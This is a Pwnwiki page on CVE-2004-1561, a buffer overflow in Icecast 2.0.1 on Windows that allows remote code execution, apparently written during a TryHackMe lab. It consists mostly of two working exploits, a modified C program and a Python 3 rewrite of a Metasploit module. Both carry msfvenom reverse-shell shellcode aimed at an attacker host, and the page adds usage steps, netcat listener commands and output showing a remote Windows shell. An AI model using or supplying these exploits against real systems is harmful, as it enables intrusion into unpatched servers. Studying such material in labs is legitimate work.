Pwnwiki: Created page with "==INFO==

 # CVE-2004-1561 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32)  Python 3 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32), rewritten f..."

2021-03-31T07:30:29Z

Created page with "==INFO== <pre> # CVE-2004-1561 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32) Python 3 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32), rewritten f..."

New page

==INFO==
<pre>
# CVE-2004-1561 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32)

Python 3 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32), rewritten from this [Metasploit module](https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/icecast_header.rb). I rewrote this from the Metasploit module because I couldn't get [this](https://www.exploit-db.com/exploits/568) to work.

## Usage:
Replace reverse shell shellcode in exploit, call it with argument for remote server and port.

```
root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000

Done!
```
Reverse shell listener:
```
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>
```

## Update for 568-edit.c
Managed to get the [original exploit](https://www.exploit-db.com/exploits/568) to work. Edited according [to this](https://www.exploit-db.com/exploits/573).

### Usage for 568-edit.c
```
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133

Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi@altervista.org
web:http://aluigi.altervista.org

shellcode add-on by Delikon
www.delikon.de

- target 192.168.92.133:8000
- send malformed data

Server IS vulnerable!!!
```
On listener
```
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>

```

</pre>

==568-edit.c==
<pre>
/*

Original exploit here: https://www.exploit-db.com/exploits/568
I couldn't get this to work so I edited it according to
https://www.exploit-db.com/exploits/573

and made sure the shellcode was executed.

Compile and run
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133

Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi@altervista.org
web:http://aluigi.altervista.org

shellcode add-on by Delikon
www.delikon.de

- target 192.168.92.133:8000
- send malformed data

Server IS vulnerable!!!

On listener
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#endif

#define VER "0.1"
#define PORT 8000
#define BUFFSZ 2048
#define TIMEOUT 3
#define EXEC "GET / HTTP/1.0\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"\xcc"

// msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.92.128 LPORT=443 -b '\x0a\x0d\x00' -f c
unsigned char shellcode[] =
"\xda\xc6\xd9\x74\x24\xf4\x5f\xb8\x1e\xf9\xbc\x15\x2b\xc9\xb1"
"\x52\x83\xef\xfc\x31\x47\x13\x03\x59\xea\x5e\xe0\x99\xe4\x1d"
"\x0b\x61\xf5\x41\x85\x84\xc4\x41\xf1\xcd\x77\x72\x71\x83\x7b"
"\xf9\xd7\x37\x0f\x8f\xff\x38\xb8\x3a\x26\x77\x39\x16\x1a\x16"
"\xb9\x65\x4f\xf8\x80\xa5\x82\xf9\xc5\xd8\x6f\xab\x9e\x97\xc2"
"\x5b\xaa\xe2\xde\xd0\xe0\xe3\x66\x05\xb0\x02\x46\x98\xca\x5c"
"\x48\x1b\x1e\xd5\xc1\x03\x43\xd0\x98\xb8\xb7\xae\x1a\x68\x86"
"\x4f\xb0\x55\x26\xa2\xc8\x92\x81\x5d\xbf\xea\xf1\xe0\xb8\x29"
"\x8b\x3e\x4c\xa9\x2b\xb4\xf6\x15\xcd\x19\x60\xde\xc1\xd6\xe6"
"\xb8\xc5\xe9\x2b\xb3\xf2\x62\xca\x13\x73\x30\xe9\xb7\xdf\xe2"
"\x90\xee\x85\x45\xac\xf0\x65\x39\x08\x7b\x8b\x2e\x21\x26\xc4"
"\x83\x08\xd8\x14\x8c\x1b\xab\x26\x13\xb0\x23\x0b\xdc\x1e\xb4"
"\x6c\xf7\xe7\x2a\x93\xf8\x17\x63\x50\xac\x47\x1b\x71\xcd\x03"
"\xdb\x7e\x18\x83\x8b\xd0\xf3\x64\x7b\x91\xa3\x0c\x91\x1e\x9b"
"\x2d\x9a\xf4\xb4\xc4\x61\x9f\x7a\xb0\x35\xdf\x13\xc3\xc5\xde"
"\x58\x4a\x23\x8a\x8e\x1b\xfc\x23\x36\x06\x76\xd5\xb7\x9c\xf3"
"\xd5\x3c\x13\x04\x9b\xb4\x5e\x16\x4c\x35\x15\x44\xdb\x4a\x83"
"\xe0\x87\xd9\x48\xf0\xce\xc1\xc6\xa7\x87\x34\x1f\x2d\x3a\x6e"
"\x89\x53\xc7\xf6\xf2\xd7\x1c\xcb\xfd\xd6\xd1\x77\xda\xc8\x2f"
"\x77\x66\xbc\xff\x2e\x30\x6a\x46\x99\xf2\xc4\x10\x76\x5d\x80"
"\xe5\xb4\x5e\xd6\xe9\x90\x28\x36\x5b\x4d\x6d\x49\x54\x19\x79"
"\x32\x88\xb9\x86\xe9\x08\xc9\xcc\xb3\x39\x42\x89\x26\x78\x0f"
"\x2a\x9d\xbf\x36\xa9\x17\x40\xcd\xb1\x52\x45\x89\x75\x8f\x37"
"\x82\x13\xaf\xe4\xa3\x31";

/*
in my example 0xcc is used to interrupt the code execution, you must
put your shellcode exactly there.
You don't need to call a shellcode offset (CALL ESP, JMP ESP and so
on) or doing any other annoying operation because the code flow
points directly there!!!
Cool and easy 8-)
*/

/*int startWinsock(void)
{
WSADATA wsa;
return WSAStartup(MAKEWORD(2,0),&wsa);
}
*/
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
u_char buff[BUFFSZ];
u_char buf[4096];
u_char *pointer=NULL;

setbuf(stdout, NULL);

fputs("\n"
"Icecast <= 2.0.1 Win32 remote code execution "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web:http://aluigi.altervista.org\n"
"\nshellcode add-on by Delikon\n"
"www.delikon.de"
"\n", stdout);

if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n"
"Note: This exploit will force the Icecast server to download NCAT\n"
"and after execution it will spwan a shell on 9999\n"
"\n", argv[0], PORT);
exit(1);
}

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

if(argc > 2) port = atoi(argv[2]);

peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port= htons(port);
peer.sin_family= AF_INET;

memset(buf,0x00,sizeof(buf));
strcpy(buf,EXEC);

pointer =strrchr(buf,0xcc);

strcpy(pointer,shellcode);

strcat(buf,"\r\n");
strcat(buf,"\r\n");

printf("\n- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();

if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();

fputs("- send malformed data\n", stdout);
if(send(sd, buf, strlen(buf), 0)
< 0) std_err();

if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}

close(sd);
return(0);
}

int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;

tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
exit(1);
}
#endif

// milw0rm.com [2004-10-06]

</pre>

==icecast.py==
<pre>
#!/usr/bin/env python3
##############################################################################################
# How to use:
# 1. Replace 'buf' shellcode below with msfvenom shellcode
# 2. Call it like this: ./icecast.py <target> <port>
# Eg. root@Kali:~# ./icecast.py 192.168.92.133 8000
##############################################################################################
import socket
import sys

host = sys.argv[1] # Receive IP from user
port = int(sys.argv[2]) # Receive Port from user

# Replace with own shellcode here
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.92.128 LPORT=443 -f python -b '\x00\x0a\x0d'

buf = ""
buf += "\xd9\xc5\xd9\x74\x24\xf4\xba\xc4\x81\xbb\x95\x5e\x31"
buf += "\xc9\xb1\x52\x31\x56\x17\x03\x56\x17\x83\x2a\x7d\x59"
buf += "\x60\x4e\x96\x1c\x8b\xae\x67\x41\x05\x4b\x56\x41\x71"
buf += "\x18\xc9\x71\xf1\x4c\xe6\xfa\x57\x64\x7d\x8e\x7f\x8b"
buf += "\x36\x25\xa6\xa2\xc7\x16\x9a\xa5\x4b\x65\xcf\x05\x75"
buf += "\xa6\x02\x44\xb2\xdb\xef\x14\x6b\x97\x42\x88\x18\xed"
buf += "\x5e\x23\x52\xe3\xe6\xd0\x23\x02\xc6\x47\x3f\x5d\xc8"
buf += "\x66\xec\xd5\x41\x70\xf1\xd0\x18\x0b\xc1\xaf\x9a\xdd"
buf += "\x1b\x4f\x30\x20\x94\xa2\x48\x65\x13\x5d\x3f\x9f\x67"
buf += "\xe0\x38\x64\x15\x3e\xcc\x7e\xbd\xb5\x76\x5a\x3f\x19"
buf += "\xe0\x29\x33\xd6\x66\x75\x50\xe9\xab\x0e\x6c\x62\x4a"
buf += "\xc0\xe4\x30\x69\xc4\xad\xe3\x10\x5d\x08\x45\x2c\xbd"
buf += "\xf3\x3a\x88\xb6\x1e\x2e\xa1\x95\x76\x83\x88\x25\x87"
buf += "\x8b\x9b\x56\xb5\x14\x30\xf0\xf5\xdd\x9e\x07\xf9\xf7"
buf += "\x67\x97\x04\xf8\x97\xbe\xc2\xac\xc7\xa8\xe3\xcc\x83"
buf += "\x28\x0b\x19\x03\x78\xa3\xf2\xe4\x28\x03\xa3\x8c\x22"
buf += "\x8c\x9c\xad\x4d\x46\xb5\x44\xb4\x01\x7a\x30\xea\x51"
buf += "\x12\x43\x12\x53\x58\xca\xf4\x39\x8e\x9b\xaf\xd5\x37"
buf += "\x86\x3b\x47\xb7\x1c\x46\x47\x33\x93\xb7\x06\xb4\xde"
buf += "\xab\xff\x34\x95\x91\x56\x4a\x03\xbd\x35\xd9\xc8\x3d"
buf += "\x33\xc2\x46\x6a\x14\x34\x9f\xfe\x88\x6f\x09\x1c\x51"
buf += "\xe9\x72\xa4\x8e\xca\x7d\x25\x42\x76\x5a\x35\x9a\x77"
buf += "\xe6\x61\x72\x2e\xb0\xdf\x34\x98\x72\x89\xee\x77\xdd"
buf += "\x5d\x76\xb4\xde\x1b\x77\x91\xa8\xc3\xc6\x4c\xed\xfc"
buf += "\xe7\x18\xf9\x85\x15\xb9\x06\x5c\x9e\xc9\x4c\xfc\xb7"
buf += "\x41\x09\x95\x85\x0f\xaa\x40\xc9\x29\x29\x60\xb2\xcd"
buf += "\x31\x01\xb7\x8a\xf5\xfa\xc5\x83\x93\xfc\x7a\xa3\xb1"

evul = "\xeb\x0c" + " / HTTP/1.1 " + buf + "\r\n" + "Accept: text/html\r\n"*31
evul += "\xff\x64\x24\x04" + "\r\n\r\n" # jmp [esp+4]

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
client.connect((host,port)) #Connect to TCP socket
client.sendall(evul.encode('latin-1')) # Send buffer overflow
client.close()

print("\nDone!")

</pre>

CVE-2004-1561 Icecast 2.0.1任意代碼執行漏洞 - Revision history

Pwnwiki: Created page with "==INFO==
# CVE-2004-1561 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32) Python 3 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32), rewritten f..."